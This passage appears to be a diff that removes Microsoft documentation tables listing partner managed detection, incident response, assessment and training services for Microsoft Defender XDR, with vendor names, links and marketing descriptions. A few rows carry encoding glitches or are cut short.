-|[SepagoSOC](https://go.microsoft.com/fwlink/?linkid=2202677)|Sepago GmbH|SepagoSOC experts ensure that your environment is constantly monitored and protected utilizing the complete range of Microsoft Defender XDR solutions and Microsoft Sentinel. They help you to constantly evolve your security landscape with both technical and organizational experience.|
-|[MDR for Microsoft](https://go.microsoft.com/fwlink/?linkid=2202762)|Red Canary|MDR for Microsoft provides 24x7 managed detection, investigation, and response to threats across your Microsoft environment.|
-|[Security Operations & MDR](https://go.microsoft.com/fwlink/?linkid=2202843)|BDO|BDO's Security Operations Center (SOC) provides continuous detection, protection, and response for organizations globally. BDO MDR is like having eyes where you don't. It's modern technology and experts make hunting, detecting, and responding one less thing to keep up with. Because they have eyes where we don't.|
-|[DXC Managed Endpoint Threat Detection and Response](https://go.microsoft.com/fwlink/?linkid=2202580)|DXC|DXC Managed Endpoint Threat Detection and Response gives your organization the capability to successfully detect and respond to threats in your environment. It's powered by Microsoft's Defender for Endpoint and DXC Technology security experts with unparalleled knowledge of global threats,|
-|[Managed Security Services for Microsoft Defender Suite](https://go.microsoft.com/fwlink/?linkid=2202476)|Dell Technologies|Dell Technologies is a Global services delivery company with a distributed Security Operations Center that is available 24 by 7 to serve customers with security monitoring and management. They help onboard customers and improve their security posture and offload the burden of hiring and managing a full security team while reaping the benefits of 24 hour detection and response.|
-|[CSIS Managed Detection & Response](https://go.microsoft.com/fwlink/?linkid=2202385)|CSIS|Provides 24/7 monitoring and analysis of security alerts giving companies actionable insights into what, when, and how security incidents have taken place.|
-|[MDR for Endpoints](https://go.microsoft.com/fwlink/?linkid=2202676)|NTT Ltd.|MDR for Endpoints helps increase your cyber resilience with Managed Detection and Response (MDR) service. Combines 24/7 human & machine expertise, best-of-breed technologies, and global threat intelligence to detect and disrupt hard-to-find attacks, making it more secure.|
-|[BlueVoyant MDR for Microsoft Defender XDR](https://www.bluevoyant.com/platform/mdr/mdr-for-microsoft)|BlueVoyant|BlueVoyant's MDR (Managed Detection and Response) for Microsoft Defender XDR combines the power of Microsoft's Defender product suite with BlueVoyant's elite 24x7 security operations team to identify, investigate, and eradicate today's most sophisticated and advanced cyberattacks. In addition to MDR, services can include implementation, assessments, training, concierge, solution integrations, and more.|
-|[White Hat Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202391)|White Hat IT Security|White Hat MSS offers zero trust approach to managed security on every platform ΓÇô scalable and adaptive security from true experts.|
-|[eSentire Managed Detection and Response](https://go.microsoft.com/fwlink/?linkid=2202582)|eSentire|MDR you can trust that provides 24/7 threat investigations and responses via Microsoft Defender XDR suite.|
-|[Aujas Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202672)|Aujas Cybersecurity|Managed security services that assist organizations to detect threats early and help minimize the impact of a breach.|
-|[Expel for Microsoft](https://go.microsoft.com/fwlink/?linkid=2202477)|Expel|Provides 24/7 detection and response for Microsoft Defender for Endpoint, Azure, and Office 365.|
-|[Managed XDR for Microsoft](https://www.cyberproof.com/security-services/managed-xdr-for-microsoft/)|CyberProof|CyberProof's Managed XDR (Extended Detection and Response) for Microsoft identifies intrusions across your enterprise as you migrate to the cloud ΓÇô from applications to endpoints, identities, and data - enabling timely response to reduce the affects of the attack. The combination of their human expertise and experience in security operations with Microsoft's 365 Defender and Microsoft Sentinel technology reduces the costs and complexity of adopting and operating a cloud-native cyber defense architecture.|
-|[Taegis XDR](https://go.microsoft.com/fwlink/?linkid=2202848)|Secureworks|Taegis™ ManagedXDR is Secureworks® 24x7 managed detection and response service, which helps you detect advanced threats and take the right action. Included threat hunting and incident response capabilities help you scale your security operations as Secureworks uses threat data collected across thousands of customers to improve your security posture. Secureworks' combination of proprietary security analytics software, SecOps expertise, incident response and threat hunting experience, threat intelligence capabilities, and 20-year history of service excellence helps reduce risk to your business.|
-|[Cloud Control - Managed Detection & Response](https://go.microsoft.com/fwlink/?linkid=2202678)|The Collective|The Collective's Cloud Control Managed Protection, Detection, and Response services is an enterprise grade managed service, delivering true Security Operations Center-as-a-Service (SOC) experience with a personal touch.|
-|[Nedscaper Managed XDR](https://nedscaper.com/mxdr/)|Nedscaper|Nedscaper Manager XDR (MDR) is a Managed Detect and Respond SaaS solution, which provides 24/7 Threat Protection, continues Vulnerability Management and combined Threat Intelligence built on Azure. The Microsoft Defender products and any security solution are connected to Microsoft Sentinel as the core platform for the Security analysts.|
-|[dinext. pi-SOC](https://dinext-group.com/)|dinext AG|Through a close integration of deployment support, security operations and consulting in hardening and architectural improvements, dinext AG accompanies customers holistically on their way to a modern security environment.|
-|[Synergy Advisors Teams App](https://synergyadvisors.biz/e-visor-teams-app/)|Synergy Advisors LLC|E-Visor Teams App is a centralized place to involve and empower your end-users in the security and productivity of the organization by presenting unique information using data from Microsoft Defenders and Microsoft Entra ID while ensuring identity governance, and compliance.|
-|[Managed Microsoft XDR](https://www.cyberproof.com/security-services/managed-xdr-for-microsoft/)|Quorum Cyber|Quorum Cyber's Managed Microsoft XDR, a solution designed to enable customers to unleash the power of Microsoft security to reduce cyber risk and maximize return of investment in security.|
-|[SecureShield365](https://patriotconsultingtech.com/)|Patriot Consulting|SecureShield365 includes a full deployment of all Microsoft Defender XDR products including Intune plus 12 months of support. Microsoft XDR including Sentinel, Defender for Cloud, and MDR are available options.|
-|[Open Systems MDR+](https://go.microsoft.com/fwlink/?linkid=2208895)|Open Systems|Built for Microsoft security customers, MDR+ combines certified experts, exemplary processes, and seamless technology to deliver tailored, 24x7 protection while reducing attack surfaces and MTTR.|
-|[Kroll](https://www.kroll.com/en/services/cyber-risk/managed-security/kroll-responder)|Kroll|Kroll provides proprietary data, technology, and insights to help our clients stay ahead of complex demands related to risk, governance, and growth. Our solutions deliver a powerful competitive advantage, enabling faster, smarter and more sustainable decisions. With 5,000 experts around the world, we create value for our clients and communities.|
-
-## Respond
-
-Respond to security incidents quickly, effectively and at scale with complete incident response including investigation, containment, remediation, and crisis management.
-
-|Service name|Vendor|Description|
-||||
-|[Microsoft Incident Response](https://go.microsoft.com/fwlink/?linkid=2203105)|Microsoft|The Cybersecurity Incident Response service is an effective way to respond to incidents due to the activities of today's adversaries and sophisticated criminal organizations. This service seeks to determine whether systems are under targeted exploitation via investigation for signs of advanced implants and anomalous behavior.|
-|[Managed Microsoft XDR](https://www.cyberproof.com/security-services/managed-xdr-for-microsoft/)|Quorum Cyber|Quorum Cyber's Managed Microsoft XDR, a solution designed to enable customers to unleash the power of Microsoft security to reduce cyber risk and maximize return of investment in security.|
-|[Trustwave MDR](https://azuremarketplace.microsoft.com/marketplace/apps/trustwaveholdingsinc1611868326737.tw_mdr_managed_service?tab=Overview)|Trustwave|Trustwave offers a security service (Gartner Leader) for endpoint using Microsoft Defender for Endpoint.|
-|[Active Remediation](https://go.microsoft.com/fwlink/?linkid=)|Red Canary|Red Canary security experts respond to remediate threats on your endpoints, 24x7. Requires Red Canary MDR for Microsoft.|
-|[Onevinn DFIR](https://go.microsoft.com/fwlink/?linkid=2202584)|Onevinn|Onevinn DFIR, Digital Defense and Incident Response team, when you're having a breach and you need urgent assistance to gain back control of your IT Environment.|
-|[Cloud Security Operations Center](https://go.microsoft.com/fwlink/?linkid=2202671)|glueckkanja-gab AG|Monitors your Microsoft Security Solutions 24/7, respond to threats on your behalf and work closely with your IT to continuously improve your security posture.|
-|[Wortell Protect](https://go.microsoft.com/fwlink/?linkid=2202480)|Wortell|Wortell offers a 24.7.365 Managed Detection and Response service, SOC-as-a-service, to secure your Azure subscriptions and Microsoft 365 environment. With this managed service, Wortell provides security monitoring and incident response, and operate Microsoft Defender and (optionally) Microsoft Sentinel on your behalf. The service also includes threat intelligence feeds and custom machine learning models|
-|[InSpark Cloud Security Center](https://go.microsoft.com/fwlink/?linkid=2202387)|InSpark|InSparks' Cloud Security Center is a 24x7 Managed Security Solution including SOC services. It continuously provides your Microsoft cloud platform with the highest level of security.|
-|[Mandiant MDR for Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2202388)|Mandiant, Inc.|Mandiant Managed Defense protects your business with a managed detection and response (MDR) service fueled by dedicated and frontline IR experts who protect against motivated adversaries with a combination of up-to-the-minute threat intelligence, data science, and real-world expertise. Managed Defense helps customers optimize investments in technology, maximize resources, and accelerate investigations.|
-|[Onevinn MDR](https://go.microsoft.com/fwlink/?linkid=2202390)|Onevinn|Onevinn MDR, Managed Detection and Response, built on Microsoft Defender and Microsoft Sentinel is a unified pre- and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks.|
-|[MDR for Microsoft](https://go.microsoft.com/fwlink/?linkid=2202762)|Red Canary|24x7 managed detection, investigation, and response to threats across your Microsoft environment.|
-|[Security Operations & MDR](https://go.microsoft.com/fwlink/?linkid=2202843)|BDO|BDO's Security Operations Center (SOC) provides continuous detection, protection, and response for organizations globally. BDO MDR is like having eyes where you don't. It's modern technology and experts make hunting, detecting, and responding one less thing to keep up with. Because they have eyes where we don't.|
-|[DXC Managed Endpoint Threat Detection and Response](https://go.microsoft.com/fwlink/?linkid=2202580)|DXC|DXC Managed Endpoint Threat Detection and Response gives your organization the capability to successfully detect and respond to threats in your environment. Powered by Microsoft's Defender for Endpoint and DXC Technology security experts with unparalleled knowledge of global threats.|
-|[Managed Security Services for Microsoft Defender Suite](https://go.microsoft.com/fwlink/?linkid=2202476)|Dell Technologies|Dell Technologies is a Global services delivery company with a distributed Security Operations Center that is available 24/7 to serve customers with security monitoring and management. Dell helps onboard customers and improve their security posture and offload the burden of hiring and managing a full security team while reaping the benefits of 24 hour detection and response.|
-|[CSIS Managed Detection & Response](https://go.microsoft.com/fwlink/?linkid=2202385)|CSIS|24/7 monitoring and analysis of security alerts giving companies actionable insights into what, when, and how security incidents occurred.|
-|[MDR for Endpoints](https://go.microsoft.com/fwlink/?linkid=2202676)|NTT Ltd.|Increase your cyber resilience with Managed Detection and Response (MDR) service. Combining 24/7 human & machine expertise, best-of-breed technologies, and global threat intelligence to detect and disrupt hard-to-find attacks, making you more secure.|
-|[BlueVoyant MDR for Microsoft Defender XDR](https://www.bluevoyant.com/platform/mdr/mdr-for-microsoft)|BlueVoyant|BlueVoyant's MDR (Managed Detection and Response) for Microsoft Defender XDR combines the power of Microsoft's Defender product suite with BlueVoyant's elite 24x7 security operations team to identify, investigate, and eradicate today's most sophisticated and advanced cyberattacks. In addition to MDR, services can include implementation, assessments, training, concierge, solution integrations, and more.|
-|[White Hat Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202391)|White Hat IT Security|White Hat MSS offers zero trust approach to managed security on every platform ΓÇô scalable and adaptive security from true experts.|
-|[eSentire Managed Detection and Response](https://go.microsoft.com/fwlink/?linkid=2202582)|eSentire|MDR you can trust that provides 24/7 threat investigations and responses via Microsoft Defender XDR suite.|
-|[Aujas Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202672)|Aujas Cybersecurity|Managed security services that assist organizations to detect threats early and help minimize the affects of a breach.|
-|[Accenture Managed Extended Detection & Response (MxDR)](https://go.microsoft.com/fwlink/?linkid=2202842)|Accenture|Accenture's Managed Extended Detection & Response (MxDR) service provides a fully managed service that proactively finds and mitigates advanced cyber-attacks and malicious activity before they cause material business impact across IT and OT environments, both in the cloud and on-premises.|
-|[Taegis XDR](https://go.microsoft.com/fwlink/?linkid=2202848)|Secureworks|Taegis™ ManagedXDR is Secureworks® 24x7 managed detection and response service, which helps you detect advanced threats and take the right action. Included threat hunting and incident response capabilities help you scale your security operations as Secureworks uses threat data collected across thousands of customers to improve your security posture. Secureworks' combination of proprietary security analytics software, SecOps expertise, incident response and threat hunting experience, threat intelligence capabilities, and 20-year history of service excellence helps reduce risk to your business.|
-|[Cloud Control - Managed Detection & Response](https://go.microsoft.com/fwlink/?linkid=2202678)|The Collective|The Collective's Cloud Control Managed Protection, Detection, and Response solution is an enterprise grade managed service, delivering true Security Operations Center-as-a-Service (SOC) experience with a personal touch.|
-|[dinext. pi-SOC](https://dinext-group.com/)|dinext AG|Through a close integration of deployment support, security operations and consulting in hardening and architectural improvements, dinext AG accompanies customers holistically on their way to a modern security environment.|
-|[Synergy Advisors Teams App](https://synergyadvisors.biz/e-visor-teams-app/)|Synergy Advisors LLC|E-Visor Teams App is a centralized place to involve and empower your end-users in the security and productivity of the organization by presenting unique information using data from Microsoft Defenders and Microsoft Entra ID while ensuring identity governance, and compliance.|
-|[SepagoSOC](https://go.microsoft.com/fwlink/?linkid=2202677)|Sepago GmbH|SepagoSOC experts ensure that your environment is constantly monitored and protected utilizing the complete range of Microsoft Defender XDR solutions and Microsoft Sentinel.SepagoSOC helps you to constantly evolve your security landscape with both technical and organizational experience.|
-|[SecureShield365](https://patriotconsultingtech.com/)|Patriot Consulting|SecureShield365 includes a full deployment of all Microsoft Defender XDR products including Intune plus 12 months of support. Microsoft XDR including Sentinel, Defender for Cloud, and MDR are available options.|
-|[Open Systems MDR+](https://go.microsoft.com/fwlink/?linkid=2208895)|Open Systems|Built for Microsoft security customers, MDR+ combines certified experts, exemplary processes, and seamless technology to deliver tailored, 24x7 protection while reducing attack surfaces and MTTR.|
-
-## Protect
-
-Protect your organization proactively by evaluating your organization's ability to effectively prevent, detect, and respond to cyber threats before they disrupt your business.
-
-|Service name|Vendor|Description|
-||||
-|[Microsoft Defender Experts](https://go.microsoft.com/fwlink/?linkid=2203232)|Microsoft|Defender Experts for Hunting is a proactive threat hunting service for Microsoft Defender XDR.|
-|[Microsoft Consulting Services - Security Operations and Threat Protection Services](https://www.microsoft.com/industrysolutions/solutions/security?activetab=pivot1:primaryr4)|Microsoft|The Microsoft Consulting Services (MCS) Security Operations and Threat Protection Services (SOTPS), provides a structured approach to modern Security Operations Center (SOC) design and implementation using effective change management techniques so your security professionals can detect attacks faster and respond more effectively.|
-|[Onevinn Threat Hunting](https://go.microsoft.com/fwlink/?linkid=2202584)|Onevinn|If your Internal SOC needs an extra pair of eyes looking for threats, Onevinn's Threat Hunters can be purchased as your extended hunting team.|
-|[Microsoft 365 Security Assessment](https://go.microsoft.com/fwlink/?linkid=2202389)|Nedscaper|The Microsoft 365 Security assessment provides a risk-based approach to scan and analyze the security baseline (prevention is better than the cure) and settings of the Microsoft 365 Security products, from Microsoft 365 E3 security products like Microsoft Entra Conditional Access and Microsoft Intune (Microsoft Defender Antivirus policies) to the Microsoft 365 E5 Security products like Microsoft Defender XDR, Microsoft Entra ID Protection and Microsoft Defender for Identity, Devices, Microsoft 365, and Cloud Apps.|
-|[Invoke Monthly Microsoft 365 Security Assessments](https://go.microsoft.com/fwlink/?linkid=2202583)|Invoke LLC|Provides monthly detailed assessment reports of active threats, vulnerabilities active and Phishing/malware campaigns targeted on your Microsoft 365 Environment. Helps with prescribed mitigations for active threats and improvement actions for recurring threats if any. Monitor Secure score and recommendations, giving your security teams an extra set of eyes to stay on top of risks.|
-|[Cloud Security Operations Center](https://go.microsoft.com/fwlink/?linkid=2202671)|glueckkanja-gab AG|Monitors your Microsoft Security Solutions 24/7, respond to threats on your behalf and work closely with your IT to continuously improve your security posture.|
-|[Wortell Protect](https://go.microsoft.com/fwlink/?linkid=2202480)|Wortell|Wortell offers a 24.7.365 Managed Detection and Response service, SOC-as-a-service, to secure your Azure subscriptions and Microsoft 365 environment. With this managed service, Wortell provides security monitoring and incident response, and operate Microsoft Defender and (optionally) Microsoft Sentinel on your behalf. The service also includes threat intelligence feeds and custom machine learning models|
-|[InSpark Cloud Security Center](https://go.microsoft.com/fwlink/?linkid=2202387)|InSpark|InSparks' Cloud Security Center is a 24x7 Managed Security Solution including SOC services. It continuously provides your Microsoft cloud platform with the highest level of security.|
-|[Mandiant MDR for Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2202388)|Mandiant, Inc.|Mandiant Managed Defense protects your business with a managed detection and response (MDR) service fueled by dedicated and frontline IR experts who protect against motivated adversaries with a combination of up-to-the-minute threat intelligence, data science, and real-world expertise. Managed Defense helps customers optimize investments in technology, maximize resources, and accelerate investigations.|
-|[Onevinn MDR](https://go.microsoft.com/fwlink/?linkid=2202390)|Onevinn|Onevinn MDR, Managed Detection and Response, built on Microsoft Defender and Microsoft Sentinel is a unified pre- and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks.|
-|[MDR for Microsoft](https://go.microsoft.com/fwlink/?linkid=2202762)|Red Canary|24x7 managed detection, investigation, and response to threats across your Microsoft environment.|
-|[Security Operations & MDR](https://go.microsoft.com/fwlink/?linkid=2202843)|BDO|BDO's Security Operations Center (SOC) provides continuous detection, protection, and response for organizations globally. BDO MDR is like having eyes where you don't. It's modern technology and experts make hunting, detecting, and responding one less thing to keep up with. Because they have eyes where we don't.|
-|[DXC Managed Endpoint Threat Detection and Response](https://go.microsoft.com/fwlink/?linkid=2202580)|DXC|DXC Managed Endpoint Threat Detection and Response gives your organization the capability to successfully detect and respond to threats in your environment. Powered by Microsoft's Defender for Endpoint and DXC Technology security experts with unparalleled knowledge of global threats,|
-|[Managed Security Services for Microsoft Defender Suite](https://go.microsoft.com/fwlink/?linkid=2202476)|Dell Technologies|Dell Technologies is a Global services delivery company with a distributed Security Operations Center that is available 24 by 7 to serve customers with security monitoring and management. Help onboard customers and improve their security posture and offload the burden of hiring and managing a full security team while reaping the benefits of 24 hour detection and response.|
-|[BlueVoyant MDR for Microsoft Defender XDR](https://www.bluevoyant.com/platform/mdr/mdr-for-microsoft)|BlueVoyant|BlueVoyant's MDR (Managed Detection and Response) for Microsoft Defender XDR combines the power of Microsoft's Defender product suite with BlueVoyant's elite 24x7 security operations team to identify, investigate, and eradicate today's most sophisticated and advanced cyberattacks. In addition to MDR, services can include implementation, assessments, training, concierge, solution integrations, and more.|
-|[White Hat Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202391)|White Hat IT Security|White Hat MSS offers zero trust approach to managed security on every platform ΓÇô scalable and adaptive security from true experts.|
-|[eSentire Managed Detection and Response](https://go.microsoft.com/fwlink/?linkid=2202582)|eSentire|MDR you can trust that provides 24/7 threat investigations and responses via Microsoft Defender XDR suite.|
-|[Aujas Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202672)|Aujas Cybersecurity|Managed security services that assist organizations to detect threats early and help minimize the impact of a breach.|
-|[Accenture Managed Extended Detection & Response (MxDR)](https://go.microsoft.com/fwlink/?linkid=2202842)|Accenture|Accenture's Managed Extended Detection & Response (MxDR) service provides a fully managed service that proactively finds and mitigates advanced cyber-attacks and malicious activity before they cause material business impact across IT and OT environments, both in the cloud and on-premises.|
-|[Taegis XDR](https://go.microsoft.com/fwlink/?linkid=2202848)|Secureworks|Taegis™ ManagedXDR is Secureworks® 24x7 managed detection and response service, which helps you detect advanced threats and take the right action. Included threat hunting and incident response capabilities help you scale your security operations as Secureworks uses threat data collected across thousands of customers to improve your security posture. Secureworks' combination of proprietary security analytics software, SecOps expertise, incident response and threat hunting experience, threat intelligence capabilities, and 20-year history of service excellence helps reduce risk to your business.|
-|[Cloud Control - Managed Detection & Response](https://go.microsoft.com/fwlink/?linkid=2202678)|The Collective|The Collective's Cloud Control Managed Protection, Detection and Response services is an enterprise grade managed service, delivering true Security Operations Center-as-a-Service (SOC) experience with a personal touch.|
-|[dinext. pi-SOC](https://dinext-group.com/)|dinext AG|Through a close integration of deployment support, security operations and consulting in hardening and architectural improvements, dinext AG accompanies customers holistically on their way to a modern security environment.|
-|[Synergy Advisors Teams App](https://synergyadvisors.biz/e-visor-teams-app/)|Synergy Advisors LLC|E-Visor Teams App is a centralized place to involve and empower your end-users in the security and productivity of the organization by presenting unique information using data from Microsoft Defenders and Microsoft Entra ID while ensuring identity governance, and compliance.|
-|[Managed Microsoft XDR](https://www.cyberproof.com/security-services/managed-xdr-for-microsoft/)|Quorum Cyber|Quorum Cyber's Managed Microsoft XDR, a solution designed to enable customers to unleash the power of Microsoft security to reduce cyber risk and maximize return of investment in security.|
-|[SepagoSOC](https://go.microsoft.com/fwlink/?linkid=2202677)|Sepago GmbH|SepagoSOC experts ensure that your environment is constantly monitored and protected utilizing the complete range of Microsoft Defender XDR solutions and Microsoft Sentinel. They help you to constantly evolve your security landscape with both technical and organizational experience.|
-|[SecureShield365](https://patriotconsultingtech.com/)|Patriot Consulting|SecureShield365 includes a full deployment of all Microsoft Defender XDR products including Intune plus 12 months of support. Microsoft XDR including Sentinel, Defender for Cloud, and MDR are available options.|
-|[Open Systems MDR+](https://www.ontinue.com/mdr/microsoft-mdr/)|Open Systems|Built for Microsoft security customers, MDR+ combines certified experts, exemplary processes, and seamless technology to deliver tailored, 24x7 protection while reducing attack surfaces and MTTR.|
-
-## Evolve
-
-Evolve your organization's security posture through improved processes and technologies that up-level threat detection, containment, and remediation capabilities.
-
-|Service name|Vendor|Description|
-||||
-|[CRITICALSTART® Cybersecurity Consulting
-|[Sepago Adapt](https://go.microsoft.com/fwlink/?linkid=2202677)|Sepago GmbH|Working with the full range of Microsoft Defender solutions requires a change in processes. Combining Microsoft and sepago best practices and your company-knowledge, together we'll build and establish processes for your organization to enable you to fully utilize the Defender solutions.|
-|[Zero Trust by Onevinn](https://go.microsoft.com/fwlink/?linkid=2202584)|Onevinn|Get started with Zero Trust by fully utilize your investment in Microsoft 365 Security Features|
-|[Cloud Security Operations Center](https://go.microsoft.com/fwlink/?linkid=2202671)|glueckkanja-gab AG|Monitors your Microsoft Security Solutions 24/7, respond to threats on your behalf and work closely with your IT to continuously improve your security posture.|
-|[Wortell Protect](https://go.microsoft.com/fwlink/?linkid=2202480)|Wortell|Wortell offers a 24.7.365 Managed Detection and Response service, SOC-as-a-service, to secure your Azure subscriptions and Microsoft 365 environment. With this managed service, Wortell provides security monitoring and incident response, and operate Microsoft Defender and (optionally) Microsoft Sentinel on your behalf. The service also includes threat intelligence feeds and custom machine learning models|
-|[Mandiant MDR for Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2202388)|Mandiant, Inc.|Mandiant Managed Defense protects your business with a managed detection and response (MDR) service fueled by dedicated and frontline IR experts who protect against motivated adversaries with a combination of up-to-the-minute threat intelligence, data science, and real-world expertise. Managed Defense helps customers optimize investments in Microsoft technology, maximize resources, and accelerate investigations.|
-|[MDR for Microsoft](https://go.microsoft.com/fwlink/?linkid=2202762)|Red Canary|24x7 managed detection, investigation, and response to threats across your Microsoft environment.|
-|[Security Operations & MDR](https://go.microsoft.com/fwlink/?linkid=2202843)|BDO|BDO's Security Operations Center (SOC) provides continuous detection, protection, and response for organizations globally. BDO MDR is like having eyes where you don't. It's modern technology and experts make hunting, detecting, and responding one less thing to keep up with. Because they have eyes where we don't.|
-|[DXC Managed Endpoint Threat Detection and Response](https://go.microsoft.com/fwlink/?linkid=2202580)|DXC|DXC Managed Endpoint Threat Detection and Response gives your organization the capability to successfully detect and respond to threats in your environment. Powered by Microsoft's Defender for Endpoint and DXC Technology security experts with unparalleled knowledge of global threats,|
-|[BlueVoyant MDR for Microsoft Defender XDR](https://www.bluevoyant.com/platform/mdr/mdr-for-microsoft)|BlueVoyant|BlueVoyant's MDR (Managed Detection and Response) for Microsoft Defender XDR combines the power of Microsoft's Defender product suite with BlueVoyant's elite 24x7 security operations team to identify, investigate, and eradicate today's most sophisticated and advanced cyberattacks. In addition to MDR, services can include implementation, assessments, training, concierge, solution integrations, and more.|
-|[White Hat Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202391)|White Hat IT Security|White Hat MSS offers zero trust approach to managed security on every platform ΓÇô scalable and adaptive security from true experts.|
-|[Taegis XDR](https://go.microsoft.com/fwlink/?linkid=2202848)|Secureworks|Taegis™ ManagedXDR is Secureworks® 24x7 managed detection and response service, which helps you detect advanced threats and take the right action. Included threat hunting and incident response capabilities help you scale your security operations as Secureworks uses threat data collected across thousands of customers to improve your security posture. Secureworks' combination of proprietary security analytics software, SecOps expertise, incident response and threat hunting experience, threat intelligence capabilities, and 20-year history of service excellence helps reduce risk to your business.|
-|[Cloud Control - Managed Detection & Response](https://go.microsoft.com/fwlink/?linkid=2202678)|The Collective|The Collective's Cloud Control Managed Protection, Detection, and Response solution is an enterprise grade managed service, delivering true Security Operations Center-as-a-Service (SOC) experience with a personal touch.|
-|[dinext. pi-SOC](https://dinext-group.com/)|dinext AG|Through a close integration of deployment support, security operations and consulting in hardening and architectural improvements, it accompanies customers holistically on their way to a modern security environment.|
-|[Managed Microsoft XDR](https://www.cyberproof.com/security-services/managed-xdr-for-microsoft/)|Quorum Cyber|Quorum Cyber's Managed Microsoft XDR, a solution designed to enable customers to unleash the power of Microsoft security to reduce cyber risk and maximize return of investment in security.|
-|[SepagoSOC](https://go.microsoft.com/fwlink/?linkid=2202677)|Sepago GmbH|SepagoSOC experts ensure that your environment is constantly monitored and protected utilizing the complete range of Microsoft Defender XDR solutions and Microsoft Sentinel. They help you to constantly evolve your security landscape with both technical and organizational experience.|
-|[SecureShield365](https://patriotconsultingtech.com/)|Patriot Consulting|SecureShield365 includes a full deployment of all Microsoft Defender XDR products including Intune plus 12 months of support. Microsoft XDR including Sentinel, Defender for Cloud, and MDR are available options.|
-|[Open Systems MDR+](https://www.ontinue.com/mdr/microsoft-mdr/)|Open Systems|Built for Microsoft security customers, MDR+ combines certified experts, exemplary processes, and seamless technology to deliver tailored, 24x7 protection while reducing attack surfaces and MTTR.|
-
-## Educate
-
-Mature and maintain your internal team's security capabilities to prevent, detect, contain, and remediate threats.
-
-|Service name|Vendor|Description|
-||||
-|[CRITICALSTART® Cybersecurity Advisory
-|[Chief 365 Defender](https://go.microsoft.com/fwlink/?linkid=2202584)|Onevinn|This course is aimed at IT security professionals and IT architects who want to get "Best Practices From the Field" within Microsoft 365 security and management of the Microsoft Defender XDR security suite.|
-|[Onevinn Chief Hunter](https://go.microsoft.com/fwlink/?linkid=2202584)|Onevinn|Onevinn Chief Hunter is a detection training on how to build proper detection in Microsoft Sentinel together with Microsoft Defender XDR.|
-|[Defend Against Threats with SIEM Plus XDR](https://go.microsoft.com/fwlink/?linkid=2202479)|Netrix|Enable customers with visibility into immediate threats across email, identity & data & how Microsoft Sentinel & Defender detect & quickly stop active threats|
-|[Defend Against Threats with SIEM Plus XDR Workshop](https://go.microsoft.com/fwlink/?linkid=2202479)|Netrix|Organizations today are managing a growing volume of data and alerts while dealing with tight budgets and vulnerable legacy systems. Get help achieving your broader security objectivesΓÇöand identify current and real threatsΓÇöby scheduling a Defend Against Threats with SIEM Plus XDR Workshop|
-|[Secure Multicloud Environments Workshop](https://go.microsoft.com/fwlink/?linkid=2202479)|Netrix|As the use of cloud services continues to grow, cyber risks and threats continue to evolve. Get help achieving your hybrid and multicloud security objectivesΓÇöand identify current and real threatsΓÇöby scheduling a Secure Multicloud Environments Workshop.|
-|[Mitigate Compliance & Privacy Risks Workshop](https://go.microsoft.com/fwlink/?linkid=2202479)|Netrix|As your business-critical data expands and your workforce shifts to remote work, having an integrated approach that can help quickly identify, triage, and act on risky insider user activity is more important than ever. The Mitigate Compliance & Privacy Risks Workshop gives you the insights you need to understand insider and privacy risks in your organization.|
-|[Secure Identities & Access Workshop](https://go.microsoft.com/fwlink/?linkid=2202479)|Netrix|Given the complexity of identities, data, applications, and devices, it's essential to learn how to ensure the right people are accessing the right information, securely. In this workshop, we show you how identity is the fundamental pillars of an integrated security philosophy and end-to-end security strategy.|
-|[Microsoft Defender XDR Professional Services](https://go.microsoft.com/fwlink/?linkid=2202675)|Netwoven|Consulting and deployment services for the Defender suite|
-|[Wortell Protect](https://go.microsoft.com/fwlink/?linkid=2202480)|Wortell|Wortell offers a 24.7.365 Managed Detection and Response service, SOC-as-a-service, to secure your Azure subscriptions and Microsoft 365 environment. With this managed service, Wortell provides security monitoring and incident response, and operate Microsoft Defender and (optionally) Microsoft Sentinel on your behalf. The service also includes threat intelligence feeds and custom machine learning models|
-|[Mandiant MDR for Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2202388)|Mandiant, Inc.|Mandiant Managed Defense protects your business with a managed detection and response (MDR) service fueled by dedicated and frontline IR experts who protect against motivated adversaries with a combination of up-to-the-minute threat intelligence, data science, and real-world expertise. Managed Defense helps customers optimize investments in Microsoft technology, maximize resources, and accelerate investigations.|
-|[BlueVoyant MDR for Microsoft Defender XDR](https://www.bluevoyant.com/platform/mdr/mdr-for-microsoft)|BlueVoyant|BlueVoyant's MDR (Managed Detection and Response) for Microsoft Defender XDR combines the power of Microsoft's Defender product suite with BlueVoyant's elite 24x7 security operations team to identify, investigate, and eradicate today's most sophisticated and advanced cyberattacks. In addition to MDR, services can include implementation, assessments, training, concierge, solution integrations, and more.|
-|[White Hat Managed Security Services](https://go.microsoft.com/fwlink/?linkid=2202391)|White Hat IT Security|White Hat MSS offers zero trust approach to managed security on every platform ΓÇô scalable and adaptive security from true experts.|
-|[Cloud Control - Managed Detection & Response](https://go.microsoft.com/fwlink/?linkid=2202678)|The Collective|The Collective's Cloud Control Managed Protection, Detection, and Response solution is an enterprise grade managed service, delivering true Security Operations Center-as-a-Service (SOC) experience with a personal touch.|
-|[Synergy Advisors Teams App](https://synergyadvisors.biz/e-visor-teams-app/)|Synergy Advisors LLC|E-Visor Teams App is a centralized place to involve and empower your end-users in the security and productivity of the organization by presenting unique information using data from Microsoft Defenders and Microsoft Entra ID while ensuring identity governance, and compliance.|
-|[Managed Microsoft XDR](https://www.cyberproof.com/security-services/managed-xdr-for-microsoft/)|Quorum Cyber|Quorum Cyber's Managed Microsoft XDR, a solution designed to enable customers to unleash the power of Microsoft security to reduce cyber risk and maximize return of investment in security.|
